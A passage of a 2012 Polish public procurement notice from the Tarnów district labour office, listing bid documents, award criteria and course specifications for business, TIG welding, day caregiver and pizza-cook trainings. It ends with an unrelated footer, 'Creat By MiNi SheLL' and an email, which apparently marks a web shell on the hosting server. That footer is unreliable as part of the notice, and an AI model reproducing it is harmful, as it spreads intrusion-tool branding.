Wszystkie dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy. Jeżeli dokumenty są poświadczone za zgodność z oryginałem przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez notariusza. 
CZĘŚĆ III ZAMÓWIENIA: 1. Kalkulacja kosztów szkolenia (załącznik nr 4).
2. Zaakceptowany projekt umowy o przeprowadzenie szkolenia (załącznik nr 5).
3. Oświadczenie dotyczące powierzenia części zamówienia podwykonawcom (załącznik nr 6).
4. Formularz ofertowy (załącznik nr 1).
5. Decyzja zatwierdzająca program szkolenia dla opiekuna dziennego wydana przez Ministra Pracy     i Polityki Społecznej.
6. Program szkolenia pn. Opiekun dzienny zgodny z rozporządzeniem Ministra Pracy i Polityki     Społecznej z dnia 25 marca 2011 r. w sprawie zakresu programów szkoleń dla opiekuna 
    w żłobku lub klubie dziecięcym, wolontariusz oraz dziennego opiekuna (Dz. U. Nr 69, poz. 368)     oraz opisem przedmiotu zamówienia (załącznik nr 3).
7. Wykaz zasobów niezbędnych do przeprowadzenia szkolenia (załącznik nr 12).
8. Zaakceptowany wzór ankiety dla uczestników szkolenia (załącznik nr 13).
9. Dokument, z którego będzie wynikało uprawnienie do podpisania oferty, np. aktualny odpis 
    z właściwego rejestru, zaświadczenia o wpisie do ewidencji działalności gospodarczej, statut,     rejestr handlowy, itp.
Wszystkie dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy. Jeżeli dokumenty są poświadczone za zgodność z oryginałem przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez notariusza. 
CZĘŚĆ IV ZAMÓWIENIA: 1. Kalkulacja kosztów szkolenia (załącznik nr 4).
2. Zaakceptowany projekt umowy o przeprowadzenie szkolenia (załącznik nr 5).
3. Oświadczenie dotyczące powierzenia części zamówienia podwykonawcom (załącznik nr 6).
4. Formularz ofertowy (załącznik nr 1).
5. Program szkolenia pn. Pizzer - Kucharz oraz opisem przedmiotu zamówienia (załącznik nr 3).
6. Wykaz zasobów niezbędnych do przeprowadzenia szkolenia (załącznik nr 12).
7. Zaakceptowany wzór ankiety dla uczestników szkolenia (załącznik nr 13).
8. Dokument, z którego będzie wynikało uprawnienie do podpisania oferty, np. aktualny odpis 
    z właściwego rejestru, zaświadczenia o wpisie do ewidencji działalności gospodarczej, statut,     rejestr handlowy, itp.
Wszystkie dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy. Jeżeli dokumenty są poświadczone za zgodność z oryginałem przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.80</li>
<li>2 - Efektywność/Współpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.10</li>
<li>3 - Certyfikat jakości usług - 0.10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, 
na podstawie której dokonano wyboru w następujący sposób:
a) w uzasadnionych przypadkach, za zgodą Zamawiającego, dopuszcza się zmianę kadry prowadzącej szkolenie - pod warunkiem, że proponowana kadra będzie spełniała warunki opisane w niniejszej specyfikacji. Informacja o zmianie musi wpłynąć do Zamawiającego 
na piśmie, na co najmniej jeden dzień przed zaistniałą okolicznością; 
b) w uzasadnionych przypadkach, za zgodą Zamawiającego, dopuszcza się zmianę miejsca prowadzenia szkolenia. Informacja o zmianie musi wpłynąć do Zamawiającego na piśmie 
co najmniej 5 dni roboczych przed rozpoczęciem szkolenia. W przypadku nagłych zdarzeń losowych termin ten nie musi być zachowany. Informacja musi wpłynąć na piśmie 
do Zamawiającego niezwłocznie po zaistniałym zdarzeniu;
c) w uzasadnionych przypadkach za zgodą Wykonawcy Zamawiający może zmienić termin rozpoczęcia i zakończenia szkolenia, przy czym warunki dotyczące tygodniowego wymiaru godzin oraz okresu realizacji zamówienia nie mogą ulec zmianie; 
d) Zamawiający przewiduje możliwość zmiany podmiotu, o którym mowa w art. 26 ust 2b ustawy w trakcie realizacji zamówienia pod warunkiem, że wskazany nowy podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o udzielenie zamówienia publicznego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.tarnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, 33-100 Tarnów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2012 godzina 12:00, miejsce: Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, 33-100 Tarnów, II piętro - sekretariat, pokój nr 214.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie szkolenia pn. ABC działalności gospodarczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. ABC działalności gospodarczej dla 20 osób, w dwóch grupach po 10 osób,
- szkolenie finansowane jest ze środków publicznych,
- szkolenie każdej grupy winno obejmować minimum 60 godzin zegarowych zajęć, 
- program szkolenia winien obejmować w szczególności: ogólne zasady ekonomiczno-prawne   prowadzenia działalności gospodarczej, wybór formy organizacyjno-prawnej działalności   gospodarczej, rozpoznanie rynku, analiza marketingowa, Biznes Plan, rejestracja   przedsiębiorstwa, działalność gospodarcza przedsiębiorstwa,
- Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
- zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 8:00 a 18:00,
- zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych :dziennie,
- szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
- absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer 
   z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku    cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej    przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę    wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia 
   i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis  osoby    upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie,
- Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 15.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Efektywność/Współpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.10</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie szkolenia pn. Spawanie blach i rur spoinami pachwinowymi metodą TIG (141).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Spawanie blach i rur   spoinami pachwinowymi metodą TIG (141) dla 10 osób, 
- szkolenie finansowane jest ze środków publicznych,
- szkolenie winno obejmować minimum 135 godzin zegarowych zajęć, w tym minimum 113 godzin   zajęć praktycznych,
- szkolenie musi być realizowane zgodnie z aktualnymi wytycznymi Instytutu Spawalnictwa 
  w Gliwicach,
- przy jednym stanowisku praktycznej nauki zawodu może pracować 1 osoba,
- Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
- zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 8:00 a 18:00,
- szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
- absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer 
  z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca   numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej   szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i  datę wydania   zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie   kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby    upoważnionej przez   instytucję szkoleniową przeprowadzającą szkolenie,
- absolwent otrzymuje również książeczkę spawacza oraz świadectwo egzaminu spawacza,
- Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 29.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Efektywność/Współpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.10</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie szkolenia pn. Opiekun dzienny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Opiekun dzienny 
  dla 10 osób, 
- szkolenie finansowane jest ze środków publicznych,
- szkolenie winno obejmować minimum 160 godzin zegarowych zajęć, 
- program szkolenia musi być zatwierdzony przez Ministra Pracy i Polityki Społecznej,
- Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
- zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 8:00 a 18:00,
- szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
- absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer 
  z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca   numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej   szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i  datę wydania  zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie  kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby    upoważnionej przez  instytucję szkoleniową przeprowadzającą szkolenie,
- Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Efektywność/Współpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.10</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeprowadzenie szkolenia pn. Pizzer-kucharz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Pizzer - Kucharz 
  dla 5 osób, 
- szkolenie finansowane jest ze środków publicznych,
- szkolenie winno obejmować minimum 60 godzin zegarowych zajęć, w tym minimum 50 godzin   zajęć praktycznych,
- program szkolenia winien obejmować w szczególności: omówienie technologiczne składników,   klasyfikacja mąk, omówienie glutenu i enzymów, podstawowe ciasto włoskie, proces wyrobu   ciasta (wyrabiania i formowanie ciasta), formowanie ciasta ręcznie, wypiek ciasta, przygotowanie   sosu do pizzy, dodatki, rodzaje ciast i rodzaje pizzy,
- Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
- zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 8:00 a 18:00,
- szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
- absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer 
  z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca   numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej   szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i  datę wydania   zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie   kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby    upoważnionej przez   instytucję szkoleniową przeprowadzającą szkolenie,
- Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 15.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Efektywność/Współpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.10</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com